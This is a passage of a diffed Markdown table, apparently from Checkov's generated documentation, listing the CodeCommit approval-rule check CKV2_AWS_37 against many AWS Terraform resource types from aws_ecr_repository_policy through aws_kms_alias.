associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1112 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1113 | 
CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1114 | CKV2_AWS_37 | resource | aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1115 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1116 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1117 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1118 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1119 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1120 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1121 | CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1122 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1123 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1124 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1125 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1126 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval 
rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1127 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1128 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1129 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1130 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1131 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1132 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1133 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1134 | CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1135 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1136 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1137 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1138 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1139 | CKV2_AWS_37 | resource | 
aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1140 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1141 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1142 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1143 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1144 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1145 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1146 | 
CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1147 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1148 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1149 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1150 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1151 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1152 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1153 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1154 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1155 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1156 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1157 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1158 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1159 | CKV2_AWS_37 | resource | 
aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1160 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1161 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1162 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1163 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1164 | CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1165 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1166 | 
CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1167 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1168 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1169 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1170 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1171 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1172 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1173 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1174 | CKV2_AWS_37 | resource | aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1175 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1176 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1177 | CKV2_AWS_37 | resource | aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1178 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1179 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1180 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1181 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1182 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1183 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1184 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1185 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1186 | CKV2_AWS_37 | 
resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1187 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1188 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1189 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1190 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1191 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1192 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1193 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1194 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1195 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1196 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1197 | CKV2_AWS_37 | resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1198 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1199 | CKV2_AWS_37 | resource | 
aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1200 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1201 | CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1202 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1203 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1204 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1205 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 
+| 1206 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1207 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1208 | CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1209 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1210 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1211 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1212 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1213 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1214 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1215 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1216 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | 